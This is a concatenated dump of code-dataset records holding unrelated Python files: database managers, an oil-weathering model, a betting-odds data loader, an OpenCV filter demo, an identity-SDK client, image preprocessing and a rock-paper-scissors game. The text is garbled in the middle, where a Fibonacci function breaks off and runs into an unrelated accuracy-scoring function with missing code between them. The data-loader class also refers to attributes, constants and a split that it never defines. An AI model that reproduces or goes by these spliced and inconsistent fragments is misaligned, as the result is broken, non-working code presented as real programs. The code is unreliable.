self.ticker_max_stop_loss_decay_function = 1\n","sub_path":"PhyTrade/Settings/Trade_sim_settings.py","file_name":"Trade_sim_settings.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462382864","text":"# coding: utf-8\n#! /usr/bin/env python3\n\n\"\"\"Implementation of the manager of the \"categories\" table\n\"\"\"\n\n# Local application imports\nfrom database.models.category_model import CategoryModel\n\nclass CategoriesManager:\n \"\"\"Manager of the \"categories\" table\n This table contains information about the categories\n \"\"\"\n def __init__(self, database_manager):\n \"\"\"Initialization of the manager instance of the \"categories\" table\n\n Args:\n database_manager (DatabaseManager): Instance of the database manager\n \"\"\"\n self.database_manager = database_manager\n\n def manage(self, *categories):\n \"\"\"Method called from the database manager\n We add the categories to the database if they are not already there\n \"\"\"\n for category in categories:\n if not self.get_id(category):\n self.add_to_table(category)\n\n def get_id(self, category):\n \"\"\"Retrieving the ID of a category from its name\n\n Args:\n category (CategoryModel): CategoryModel instance\n\n Returns:\n Int: Category ID in the database\n \"\"\"\n cursor = self.database_manager.mydb.cursor(buffered=True)\n query = (\"\"\"\n SELECT category_id\n FROM categories\n WHERE category_name = %s\n \"\"\")\n if category:\n data = (category.category_name,)\n cursor.execute(query, data)\n result = cursor.fetchone()\n cursor.close()\n if result is not None:\n return result[0]\n return None\n\n def add_to_table(self, category):\n \"\"\"Injection of a category into the \"categories\" table\n\n Args:\n category (CategoryModel): CategoryModel instance\n \"\"\"\n cursor = self.database_manager.mydb.cursor(buffered=True)\n statement = (\n \"INSERT INTO categories\"\n \"(category_name)\"\n \"VALUES (%s)\"\n )\n data = (category.category_name,)\n cursor.execute(statement, data)\n cursor.close()\n\n def create_categories(self, *categories_infos):\n \"\"\"Creates instances of the CategoryModel object\n\n Args:\n categories_infos (List): Categories informations\n\n Returns:\n List: CategoryModel instances\n \"\"\"\n categories = list()\n for category_infos in categories_infos:\n 
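Trade_sim_settings pairs each max/min bound with a *_decay_function selector but never defines the mapping here. One plausible reading -- an assumption, not the project's code -- is a per-slice interpolation from the max down to the min across nb_data_slices:

def decayed_value(max_val, min_val, slice_idx, nb_slices, decay_function=1):
    # Hypothetical decay: code 1 = linear from max_val to min_val.
    if nb_slices <= 1 or decay_function != 1:
        return max_val
    t = slice_idx / (nb_slices - 1)
    return max_val + (min_val - max_val) * t

# investment share per trade over the 5 configured data slices
for s in range(5):
    print(round(decayed_value(0.30, 0.05, s, nb_slices=5), 4))
# 0.3, 0.2375, 0.175, 0.1125, 0.05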
category = self.create(category_infos)\n categories.append(category)\n return categories\n\n def create(self, category_infos):\n \"\"\"Creates an instance of the CtaegoryModel object\n Adaptation according to the amount of information available\n\n Args:\n category_infos (List): Category information in the database\n\n Returns:\n CategoryModel: CategoryModel instance\n \"\"\"\n # If we know the name and the ID of the category\n if len(category_infos) == 2:\n category = CategoryModel(category_name=category_infos[1],\n category_id=category_infos[0])\n\n # If we only know the name of the category\n elif len(category_infos) == 1:\n category = CategoryModel(category_name=category_infos[0])\n category.category_id = self.get_id(category)\n else:\n category = CategoryModel(category_name=category_infos)\n category.category_id = self.get_id(category)\n return category\n","sub_path":"database/managers/categories_manager.py","file_name":"categories_manager.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"7970120","text":"#!/usr/bin/env python\nimport copy\nfrom datetime import timedelta\n\nimport numpy\nnp = numpy\nfrom colander import (SchemaNode, drop, Bool)\n\nfrom gnome.persist.validators import convertible_to_seconds\nfrom gnome.persist.base_schema import ObjType\nfrom gnome.persist.extend_colander import LocalDateTime\n\nfrom gnome.array_types import mass_components, half_lives\nfrom gnome.utilities.serializable import Serializable\n\nfrom gnome.movers.movers import Mover\n\n\nclass WeathererSchema(ObjType):\n on = SchemaNode(Bool(), default=True, missing=True)\n active_start = SchemaNode(LocalDateTime(), missing=drop,\n validator=convertible_to_seconds)\n active_stop = SchemaNode(LocalDateTime(), missing=drop,\n validator=convertible_to_seconds)\n\n\nclass Weatherer(Mover, Serializable):\n '''\n Base Weathering agent. This is almost exactly like the base Mover\n in the way that it acts upon the model. It contains the same API\n as the mover as well.\n '''\n _state = copy.deepcopy(Mover._state)\n _schema = WeathererSchema\n\n def __init__(self, **kwargs):\n '''\n :param weathering: object that represents the weathering\n properties of the substance that our\n LEs are made up of.\n '''\n super(Weatherer, self).__init__(**kwargs)\n self.array_types.update({'mass_components': mass_components,\n 'half_lives': half_lives})\n\n def __repr__(self):\n return ('{0.__class__.__module__}.{0.__class__.__name__}('\n 'active_start={0.active_start!r}, '\n 'active_stop={0.active_stop!r}, '\n 'on={0.on}, '\n 'active={0.active}'\n ')'.format(self))\n\n def weather_elements(self, sc, time_step, model_time):\n '''\n Here we run get_move, and then apply the results to the elements\n in our spill container. 
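manage() in the categories_manager record issues a SELECT-then-INSERT per category. With a UNIQUE constraint on category_name -- a schema tweak, not the record's schema -- SQLite collapses that into one INSERT OR IGNORE per batch:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE categories ("
             "category_id INTEGER PRIMARY KEY AUTOINCREMENT,"
             "category_name TEXT UNIQUE NOT NULL)")

names = [("snacks",), ("beverages",), ("snacks",)]  # duplicate on purpose
conn.executemany(
    "INSERT OR IGNORE INTO categories (category_name) VALUES (?)", names)
conn.commit()
print(conn.execute("SELECT * FROM categories").fetchall())
# [(1, 'snacks'), (2, 'beverages')] -- the duplicate was skipped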
It just seems more intuitive that the\n        weatherer controls what happens to the elements instead of the model,\n        as happens with the movers.\n        '''\n        hl = self.get_move(sc, time_step, model_time)\n        sc['mass_components'][:] = hl\n        sc['mass'][:] = hl.sum(1)\n\n    def get_move(self, sc, time_step, model_time):\n        m0, f, time = self._xform_inputs(sc, time_step, model_time)\n        return self._halflife(m0, f, time)\n\n    def _xform_inputs(self, sc, time_step, model_time):\n        'make sure our inputs are a good fit for our calculations'\n        if 'mass_components' not in sc:\n            raise ValueError('No mass attribute available to calculate '\n                             'weathering')\n\n        if 'half_lives' not in sc:\n            raise ValueError('No half-lives attribute available to calculate '\n                             'weathering')\n\n        time_step = self._get_active_time(time_step, model_time)\n        return sc['mass_components'], sc['half_lives'], time_step\n\n    def _get_active_time(self, time_step, model_time):\n        'calculate the weathering time duration in seconds'\n        if hasattr(time_step, 'total_seconds'):\n            time_step = time_step.total_seconds()\n        model_end_time = model_time + timedelta(seconds=time_step)\n\n        if self.active_stop < model_end_time:\n            model_end_time = self.active_stop\n        if self.active_start > model_time:\n            model_time = self.active_start\n\n        if model_end_time > model_time:\n            return (model_end_time - model_time).total_seconds()\n        else:\n            return 0\n\n    def _halflife(self, M_0, factors, time):\n        'Assumes our factors are half-life values'\n        half = np.float64(0.5)\n        total_mass = M_0 * (half ** (time / factors))\n\n        return total_mass\n","sub_path":"py_gnome/gnome/weatherers/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"566142716","text":"import logging\nimport os\nimport random\nfrom collections import OrderedDict\nfrom typing import Tuple, List, Dict\n\nimport cv2\nimport numpy as np\nimport pandas as pd\n\nfrom cxflow.datasets import BaseDataset\nfrom fuel.datasets import IndexableDataset\nfrom fuel.schemes import SequentialScheme, ShuffledScheme\nfrom fuel.streams import DataStream\n\nfrom datasets.partial_transformer import PartialTransformer\nfrom datasets.augmentations import *\n\n\nclass BaselineDataset(BaseDataset):\n    \"\"\"Create FUEL datastreams\"\"\"\n\n    def _init_with_kwargs(self, output_dir: str, split_path, data_root, batch_size: int = 2, **kwargs):\n        \"\"\"\n        Initialize dataset\n        :param output_dir: current log directory\n        :param split_path: path to the CSV file describing the train/valid/test split\n        :param data_root: root directory containing the per-match data files\n        :param batch_size: batch size\n        \"\"\"\n        logging.info('Creating dataset')\n        self._data_root = data_root\n        self._batch_size = batch_size\n        self._split = split_path\n\n        split_df = pd.read_csv(self._split, index_col=0)\n\n        # save split to log\n        if output_dir:\n            split_save_path = os.path.join(output_dir, 'split.csv')\n            split_df.to_csv(split_save_path)\n            logging.info('Split written to `%s`', split_save_path)\n\n        self._data = {}\n\n        for stream_label in ['train', 'valid']:\n            logging.info('\\t%s:', stream_label)\n            # one list per field (a chained assignment would alias them all to a single list)\n            ids, odds, hours, bookmakers, teams, results, my_odds = ([] for _ in range(7))\n\n            logging.debug('Reading labels')\n            data_filenames = list(split_df[split_df['set'] == stream_label]['filename'])\n\n            for filename in data_filenames:\n                data_df = pd.read_csv(os.path.join(self._data_root, filename))\n\n                # parse dataframe\n                teams_match = 
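# A minimal, self-contained sketch of the half-life decay that Weatherer._halflife
# above applies: mass after time t is M0 * 0.5 ** (t / half_life). The masses and
# half-lives below are illustrative values, not project data.
import numpy as np

m0 = np.array([100.0, 50.0])              # initial mass per component
half_lives = np.array([3600.0, 7200.0])   # half-life of each component, seconds
t = 3600.0                                # one hour of weathering

remaining = m0 * 0.5 ** (t / half_lives)
# the 1 h component halves to 50.0; the 2 h component decays to 50 * 2**-0.5 ~= 35.36
print(remaining)  # [50.         35.35533906]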
filename.split('_')[:2]\n                result_match = filename.split('_')[2].split('.')[0]\n                hours_match = np.array(data_df['hours_to_go'])\n                odds_match = np.array(data_df[['1', 'x', '2']])\n                bookmakers_match = data_df['bookmaker']\n                my_odds_match = [1.5, 1.5, 1.5]\n\n                ids.append(filename)\n                odds.append(odds_match)\n                hours.append(hours_match)\n                bookmakers.append(bookmakers_match)\n                teams.append(teams_match)\n                results.append(result_match)\n                my_odds.append(my_odds_match)\n\n\n            logging.info('----- Loaded {} {} data'.format(len(ids), stream_label))\n\n            self._data[stream_label] = IndexableDataset(OrderedDict([('odds', odds),\n                                                                     ('hours', hours),\n                                                                     ('bookmakers', bookmakers),\n                                                                     ('teams', teams),\n                                                                     ('results', results),\n                                                                     ('my_odds', my_odds),\n                                                                     ('ids', ids)]))\n\n    def create_train_stream(self):\n        iter_scheme = ShuffledScheme(self._data['train'].num_examples, self._batch_size)\n        stream = DataStream(self._data['train'], iteration_scheme=iter_scheme)\n        stream = MergeSparse(stream, in_names=['labels_indices', 'labels_values'])\n\n        # augmentations\n        for aug in self._augmentations:\n            info = self._augmentations[aug]\n            if np.random.rand() > 1 - info['probability']:\n                stream = globals()[aug](stream, in_names=info['input'], parameters=info['parameters'])\n\n        stream = CutAndPadImage(stream, in_names=['images'], max_cuts=self._max_cuts)\n        return stream.get_epoch_iterator(as_dict=True)\n\n    def create_valid_stream(self):\n        iter_scheme = SequentialScheme(self._data['valid'].num_examples, self._batch_size)\n        stream = DataStream(self._data['valid'], iteration_scheme=iter_scheme)\n        stream = MergeSparse(stream, in_names=['labels_indices', 'labels_values'])\n        stream = CutAndPadImage(stream, in_names=['images'], max_cuts=self._max_cuts)\n        return stream.get_epoch_iterator(as_dict=True)\n\n    def create_test_stream(self):\n        iter_scheme = SequentialScheme(self._data['test'].num_examples, self._batch_size)\n        stream = DataStream(self._data['test'], iteration_scheme=iter_scheme)\n        stream = MergeSparse(stream, in_names=['labels_indices', 'labels_values'])\n        stream = CutAndPadImage(stream, in_names=['images'], max_cuts=self._max_cuts)\n        return stream.get_epoch_iterator(as_dict=True)\n\n    def split(self, num_splits: int, train: float, valid: float, test: float):\n        filenames = [filename for filename in os.listdir(self._data_root) if '.csv' not in filename]\n        random.shuffle(filenames)\n\n        sum_ratio = train + valid + test\n        test_count = int(len(filenames) / sum_ratio * test)\n        valid_count = int(len(filenames) / sum_ratio * valid)\n        train_count = len(filenames) - test_count - valid_count\n\n        train_set = filenames[:train_count]\n        valid_set = filenames[train_count:train_count + valid_count]\n        test_set = filenames[train_count + valid_count:]\n\n        split = pd.DataFrame(columns=['filename', 'set'])\n        for label, part in zip(['train', 'valid', 'test'], [train_set, valid_set, test_set]):\n            for example in part:\n                split = split.append(pd.Series({'filename': example, 'set': label}), ignore_index=True)\n        split.to_csv(self._split, encoding='utf-8')\n        logging.info('Dataset split dumped to `%s`', self._split)\n\n\nclass MergeSparse(PartialTransformer):\n    \"\"\"Transformer merges batch of n-1 dimensional indices (and values) to n-dims\n    Example: input: ([0, 1, 2, 0, 1], [1, 2, 3, 4, 5])\n             output: ([[0, 0], [0, 1], [0, 2], [1, 0], [1, 1]], [1, 2, 3, 4, 5])\n    \"\"\"\n    def _transformation(self, data):\n        indices, values = data\n        final_indices = []\n        final_values = []\n        for i, (row_indices, row_values) in enumerate(zip(indices, values)):\n            final_indices += [[i, j] for j in 
row_indices]\n final_values += list(row_values)\n return np.array(final_indices), np.array(final_values)\n\n\nclass CutAndPadImage(PartialTransformer):\n \"\"\"Takes a batch of images shaped [B x H x W x C]\n and returns batch of arrays of cuts (slices): B x Slices x H x CutW x C\"\"\"\n def _transformation(self, data):\n images, = data\n padded_images = []\n for image in images:\n img_width = np.shape(image)[1]\n cuts = []\n # cut one image to list of cuts\n for i in range(0, img_width - consts.CUT_WIDTH, consts.CUT_STRIDE):\n cuts.append(image[:, i:i + consts.CUT_WIDTH, :])\n # take the list, pad it and append np.array to list padded_images\n padded_images.append(np.pad(np.array(cuts),\n [(0, self.max_cuts - len(cuts)), (0, 0), (0, 0), (0, 0)],\n mode='constant'))\n return np.array(padded_images),","sub_path":"datasets/baseline_dataset.py","file_name":"baseline_dataset.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"172530509","text":"import pandas as pd\nimport os, glob\nimport numpy as np\nimport sys\nimport shutil\n\ntrain_dir = \"D:/data/fashion/image_retrieval/mvc/images/images_resize\"\ntest_dir = \"D:/data/fashion/image_retrieval/mvc/images/images_resize_test\"\ntrain_output = os.path.join(os.path.dirname(train_dir), \"train\")\ntest_output = os.path.join(os.path.dirname(test_dir), \"test\")\ndf = pd.read_json(\"d:/data/fashion/image_retrieval/mvc/mvc_info.json\")\n\nif not os.path.isdir(train_output):\n os.makedirs(train_output)\nif not os.path.isdir(test_output):\n os.makedirs(test_output)\ntot = len(df)\nfor i, row in enumerate(df.iterrows()):\n print(i, tot)\n product_id = str(row[1].productId)\n file_name = os.path.basename(row[1].image_url_4x)\n train_path = os.path.join(train_dir, file_name)\n test_path = os.path.join(test_dir, file_name)\n from_path = None\n if os.path.isfile(train_path):\n output_dir = os.path.join(train_output, product_id)\n from_path = train_path\n else:\n output_dir = os.path.join(test_output, product_id)\n from_path = test_path\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n shutil.copy(from_path, output_dir)\n","sub_path":"dataset/script/mvc_split_items.py","file_name":"mvc_split_items.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525313271","text":"class Solution:\n def isValid(self, s: str) -> bool:\n opening = ['(','[','{']\n closing = [')',']','}']\n stack = [];balanced = False\n for element in s:\n if element in opening:\n stack.append(element)\n else:\n if len(stack) == 0:\n return False\n elif element in closing:\n top = stack.pop()\n if not self.matches(top,element):\n return False\n else:\n balanced = True\n return balanced and len(stack) == 0\n\n\n def matches(self,opening,closing):\n return (opening=='(' and closing == ')') or (opening == '[' and closing == ']') or (opening == '{' and closing == '}')\n\nif __name__ == '__main__':\n balanced = Solution()\n s = \"()[((({})))]({}\"\n print(balanced.isValid(s))\n","sub_path":"Algorithms/HundredDaysOfCode/EasyProblems.py","file_name":"EasyProblems.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462557546","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"./img/messi.jpg\")\nimg_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Define filter\nf = np.float32([[-1, 0, 1], 
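# A small stand-alone sketch of the cut-and-pad transformation implemented by
# CutAndPadImage above. CUT_WIDTH, CUT_STRIDE and MAX_CUTS are assumed constants
# standing in for the project's `consts` module and `max_cuts` attribute.
import numpy as np

CUT_WIDTH, CUT_STRIDE, MAX_CUTS = 4, 2, 5
image = np.arange(30).reshape(3, 10, 1)   # one H x W x C image

# slide a CUT_WIDTH-wide window over the width, then zero-pad to MAX_CUTS slices
cuts = [image[:, i:i + CUT_WIDTH, :]
        for i in range(0, image.shape[1] - CUT_WIDTH, CUT_STRIDE)]
padded = np.pad(np.array(cuts),
                [(0, MAX_CUTS - len(cuts)), (0, 0), (0, 0), (0, 0)],
                mode='constant')
print(padded.shape)  # (5, 3, 4, 1): MAX_CUTS x H x CUT_WIDTH x C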
[-2, 0, 2], [-1, 0, 1]])\n\n# Filter\ndst = cv2.filter2D(img_gray, -1, f)\ndst_gauss = cv2.GaussianBlur(img, (3,3), 0)\ndst_average = cv2.blur(img, (3,3))\n\ncv2.imshow(\"Original\", img)\ncv2.imshow(\"Transformed\", dst)\ncv2.imshow(\"Gauss\", dst_gauss),\ncv2.imshow(\"Avg\", dst_average)\ncv2.waitKey(0)","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209958657","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport json\nimport time\nimport uuid\nfrom os import environ\nfrom os.path import isfile, expanduser\n\nimport requests\nfrom past.builtins import basestring\n\nimport yoti_python_sdk\nfrom config import SDK_IDENTIFIER\nfrom yoti_python_sdk.activity_details import ActivityDetails\nfrom yoti_python_sdk.crypto import Crypto\nfrom yoti_python_sdk.protobuf.v1 import protobuf\n\nNO_KEY_FILE_SPECIFIED_ERROR = 'Please specify the correct private key file ' \\\n 'in Client(pem_file_path=...)\\nor by setting ' \\\n 'the \"YOTI_KEY_FILE_PATH\" environment variable'\n\n\nclass Client(object):\n def __init__(self, sdk_id=None, pem_file_path=None):\n self.sdk_id = sdk_id or environ.get('YOTI_CLIENT_SDK_ID')\n pem_file_path_env = environ.get('YOTI_KEY_FILE_PATH')\n\n if pem_file_path is not None:\n error_source = 'argument specified in Client()'\n pem = self.__read_pem_file(pem_file_path, error_source)\n elif pem_file_path_env is not None:\n error_source = 'specified by the YOTI_KEY_FILE_PATH env variable'\n pem = self.__read_pem_file(pem_file_path_env, error_source)\n else:\n raise RuntimeError(NO_KEY_FILE_SPECIFIED_ERROR)\n\n self.__crypto = Crypto(pem)\n\n @staticmethod\n def __read_pem_file(key_file_path, error_source):\n try:\n key_file_path = expanduser(key_file_path)\n\n if not isinstance(key_file_path, basestring) or not isfile(key_file_path):\n raise IOError('File not found: {0}'.format(key_file_path))\n with open(key_file_path, 'rb') as pem_file:\n return pem_file.read().strip()\n except (AttributeError, IOError, TypeError, OSError) as exc:\n error = 'Could not read private key file: \"{0}\", passed as: {1} '.format(key_file_path, error_source)\n exception = '{0}: {1}'.format(type(exc).__name__, exc)\n raise RuntimeError('{0}: {1}'.format(error, exception))\n\n def get_activity_details(self, encrypted_request_token):\n response = self.__make_request(encrypted_request_token)\n receipt = json.loads(response.text).get('receipt')\n\n encrypted_data = protobuf.Protobuf().current_user(receipt)\n\n if not encrypted_data:\n return ActivityDetails(receipt)\n\n unwrapped_key = self.__crypto.decrypt_token(receipt['wrapped_receipt_key'])\n decrypted_data = self.__crypto.decipher(\n unwrapped_key,\n encrypted_data.iv,\n encrypted_data.cipher_text\n )\n attribute_list = protobuf.Protobuf().attribute_list(decrypted_data)\n return ActivityDetails(receipt, attribute_list)\n\n def __make_request(self, encrypted_request_token):\n path = self.__get_request_path(encrypted_request_token)\n url = yoti_python_sdk.YOTI_API_ENDPOINT + path\n headers = self.__get_request_headers(path)\n response = requests.get(url=url, headers=headers)\n\n if not response.status_code == 200:\n raise RuntimeError('Unsuccessful Yoti API call: {0}'.format(response.text))\n\n return response\n\n def __get_request_path(self, encrypted_request_token):\n token = self.__crypto.decrypt_token(encrypted_request_token).decode('utf-8')\n nonce = uuid.uuid4()\n timestamp = 
int(time.time() * 1000)\n\n        return '/profile/{0}?nonce={1}&timestamp={2}&appId={3}'.format(\n            token, nonce, timestamp, self.sdk_id\n        )\n\n    def __get_request_headers(self, path):\n        return {\n            'X-Yoti-Auth-Key': self.__crypto.get_public_key(),\n            'X-Yoti-Auth-Digest': self.__crypto.sign('GET&' + path),\n            'X-Yoti-SDK': SDK_IDENTIFIER,\n            'Content-Type': 'application/json',\n            'Accept': 'application/json'\n        }\n","sub_path":"yoti_python_sdk/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"286760520","text":"# function definition \ndef fib_int(n):\n a,b,=0,1\n while a min_gx:\n\t\t\t\t\t\tmin_idx = x\n\t\t\t\t\t\tmin_gx = gx(w[x], w0[x], [data], W)\n\t\t\t\telse:\n\t\t\t\t\tif gx(w[x], w0[x], [data], W[x]) > min_gx:\n\t\t\t\t\t\tmin_idx = x\n\t\t\t\t\t\tmin_gx = gx(w[x], w0[x], [data], W[x])\n\n\t\t\tconfusion[classCount][min_idx] += 1\n\t\tclassCount += 1\n\n\tprint(confusion)\n\tprecision = []\n\trecall = []\n\tfmeasure = []\n\n\tfor i in range(len(test_data)):\n\t\tright += confusion[i][i]\n\t\tprecision.append(confusion[i][i]/sum(confusion[i]))\n\t\trecall.append(confusion[i][i]/(sum(x[i] for x in confusion)))\n\n\tfor i in range(len(test_data)):\n\t\tfmeasure.append(2*precision[i]*recall[i]/(precision[i] + recall[i]))\n\n\taccuracy = right / total\n\n\treturn confusion, accuracy, precision, recall, fmeasure\n\t","sub_path":"accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417211444","text":"import numpy as np\nimport pandas as pd\n\nimport sklearn\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\n\nimport imageio\n\n\n# Used these values to edit the .csv files to convert the data to be between 0-255 for each column\n# def div_by_256(n):\n#     return int(n/256)\n# # Max Bin divisor\n# # branch-misses \t591493 2320\n# # branch-loads \t82718597 324387\n# # L1-dcache-loads \t37533491 147191\n# # L1-dcache-stores \t21723268 85190\n# max_val_4 = [591493, 82718597, 37533491, 21723268]\n# bin_count_4 = map(div_by_256, max_val_4)\n#\n# # Max Bin divisor\n# # bus-cycles 1957393 7677\n# # branch-instructions \t35057193 137480\n# # branch-misses \t591493 2320\n# # instructions \t116254971 455902\n# # branch-loads \t82718597 324387\n# # L1-dcache-loads \t37533491 147191\n# # L1-dcache-stores \t21723268 85190\n# # iTLB-load-misses \t34729 137\n# max_val_8 = [1957393, 35057193, 591493, 116254971, 82718597, 37533491, 21723268, 34729]\n# bin_count_8 = map(div_by_256, max_val_8)\n\n\n\n# Pick the file to use\n# Open the file and read in the data\nfile_name = 'GrayScale-4'\n# file_name = 'GrayScale-8'\nfile_path = '../GrayScaleDataset/' + file_name + '.csv'\n\nbase_folder = \"../grayscale-images-4\"\n# base_folder = \"../grayscale-images-8\"\n\n\nraw_data = pd.read_csv(file_path)\nprint(raw_data)\n\n# transformed_data = raw_data\n# transformed_data['class'] = transformed_data['class'].map({'backdoor': True, 'rootkit':True,'trojan':True,'virus':True,'worm':True, 'benign': False})\n\n# print(transformed_data)\n# # transformed_data.pop('class')\n# dataset_size= transformed_data.values.__len__()\n# print(\"dataset_size \", dataset_size)\n# image_arrays = []\n# print(\"image_arrays \", image_arrays)\n# print(\"image_arrays.len \", image_arrays.__len__())\n\n\n# Use a utility from sklearn to split and shuffle our 
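# The accuracy.py fragment above derives per-class precision, recall and
# F-measure from a confusion matrix. The same arithmetic on a tiny made-up
# 2x2 matrix (rows = actual class, columns = predicted class):
confusion = [[8, 2],
             [1, 9]]

for c in range(2):
    tp = confusion[c][c]
    precision = tp / sum(row[c] for row in confusion)   # column sum
    recall = tp / sum(confusion[c])                     # row sum
    f_measure = 2 * precision * recall / (precision + recall)
    print(c, round(precision, 3), round(recall, 3), round(f_measure, 3))
# 0 0.889 0.8 0.842
# 1 0.818 0.9 0.857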
dataset.\ntrain_df, test_df = train_test_split(raw_data, test_size=0.2)\ntrain_df, val_df = train_test_split(train_df, test_size=0.2)\n\n\ncount = {\"backdoor\":0,\"benign\":0,\"rootkit\":0,\"trojan\":0,\"virus\":0,\"worm\":0}\n\ndataset = [train_df, test_df, val_df]\ndataset_name = [\"train\", \"test\", \"val\"]\n\nfor i in range(3):\n folder = dataset_name[i]\n for row in dataset[i].values:\n row_values = row[0:-1]\n\n # 16 x 16 input size\n # A attributes: A*n x A*n where n=number of duplicate values\n # 8 attributes: 8*2 x 8*2\n # 4 attributes: 4*4 x 4*4\n\n # 4 attributes\n # print(\"row \", row_values)\n half_row = np.append(row_values, row_values)\n full_row = np.append(half_row, half_row)\n # print(\"full \", full_row)\n\n # 8 attributes\n # print(\"row \", row_values)\n # full_row = np.append(row_values, row_values)\n # print(\"full \", full_row)\n\n a = np.empty((0, 16))\n for i in range(16):\n a = np.append(a, [full_row], axis=0)\n\n a = np.uint8(a)\n # f = open(\"temp\",'rw')\n file_name = base_folder+\"/\"+folder + \"/\" + row[-1] + '-' + str(count[row[-1]]) + '.png'\n count[row[-1]] += 1\n imageio.imwrite(file_name, a)\n\n # image_arrays.append(g)\n\n\n\n\n# grayscale_data = transformed_data['class']\n# grayscale_data = pd.DataFrame(grayscale_data)\n#\n\n\n\n\n","sub_path":"Python/preprocessing/grayscale-tranform-preprocessing.py","file_name":"grayscale-tranform-preprocessing.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503541632","text":"#Rock Paper scissors\n\nprint(\"importing pre-requisites...\")\n#Grab random so we can use choice\nimport random as rand\n\n#Patch notes:\n#Ver 1.0:\n#-Game created\n#Ver 2.0:\n#-Draw conditions added.\n#Ver 3.0:\n# Options for Human v Computer play installed\n#ver 4.0:\n# Enabled repeat play.\n#ver 5.0:\n# allowed for cheat detection. no more crashes by entering a null value!\n\nprint(\"creating environment variables\")\n#valid choices\nvalid = (\"rock\", \"paper\", \"scissors\")\n\n#set up while variable\nrepeat = 0\n\n#options for how the computer will play\n# Leaving as list no tuple for now for future expansion\n# '''[Computer enabled, Play Mode]'''\ncompOptions = [False, 1]\n#Modes:\n# 0: Pick a choice at random\n# 1: Pick a choice at random, weighted to tie\n\nprint(\"Rock-Paper-Scissors module installed! 
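# The image-building loop above tiles a 4-value feature row into a 16x16
# grayscale image through repeated np.append calls; np.tile expresses the same
# construction directly (a sketch with made-up counter values):
import numpy as np

row_values = np.array([10, 20, 30, 40], dtype=np.uint8)  # 4 binned perf counters
full_row = np.tile(row_values, 4)     # 16 values, like the two append steps
img = np.tile(full_row, (16, 1))      # stack the row 16 times -> 16 x 16
print(img.shape, img.dtype)           # (16, 16) uint8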
Please enjoy\")\n\n#start while loop\nwhile repeat == 0:\n    if compOptions[0] == False:\n        print(\"Player One please pick your option\")\n        player1 = input().lower()\n        print(\"Player Two please pick your option\")\n        player2 = input().lower()\n    else:\n        print(\"Human Player, please make your choice\")\n        player1 = input().lower()\n\n    # print(valid.index(player1))\n\n    #Generate weights for compPlay\n    if compOptions[0] == True and compOptions[1] != 0:\n        weight = [1, 1, 1]\n        if player1 in valid:\n            weight[valid.index(player1)] += 3\n\n    #Computer makes choice\n    if compOptions[0] == True and compOptions[1] == 0:\n        player2 = rand.choice(valid)\n    if compOptions[0] == True and compOptions[1] == 1:\n        player2 = rand.choices(valid, weights= weight, k=1)[0]\n    # if compOptions[1] == 2:\n    #     player2 = rand.choices(valid, weights= weight, k=1)\n    \n\n    #compare results\n\n    #player one wins\n    #paper beats rock beats scissors beats paper\n    if player1 == \"paper\" and player2 == \"rock\" or player1 == \"rock\" and player2 == \"scissors\" or player1 == \"scissors\" and player2 == \"paper\":\n        winner = \"One\"\n    #player two wins\n    if player2 == \"paper\" and player1 == \"rock\" or player2 == \"rock\" and player1 == \"scissors\" or player2 == \"scissors\" and player1 == \"paper\":\n        winner = \"Two\"\n\n    #Tie\n    if player1 == player2:\n        winner = \"Tie\"\n\n    #cheat!\n    if player1 not in valid or player2 not in valid:\n        winner = \"No Win\"\n\n    winCondition = {\"One\":\"Player One Wins!\", \"Two\":\"Player Two Wins!\", \"Tie\":\"Tie! No winners, but no losers!\", \"No Win\":\"Hey, One of you cheated! No winning for either of you!\"}\n\n    #Commented out to fix the draw condition.\n    # print(f\"the winner is Player {winner}\")\n\n    print(winCondition[winner])\n    print(\"Would you like another game?(y/n)\")\n    if input().lower() == \"n\":\n        repeat = 1\nprint(\"Thanks for playing! 
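# How the weighted computer move above biases random.choices toward a tie:
# with base weights [1, 1, 1] plus 3 on the human's pick, the tying option is
# drawn 4 times out of 6 on average (illustrative simulation, not game code).
import random

valid = ("rock", "paper", "scissors")
player1 = "rock"
weight = [1, 1, 1]
weight[valid.index(player1)] += 3     # -> [4, 1, 1]

draws = [random.choices(valid, weights=weight, k=1)[0] for _ in range(6000)]
print(draws.count("rock") / len(draws))  # ~0.67, i.e. about 4/6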
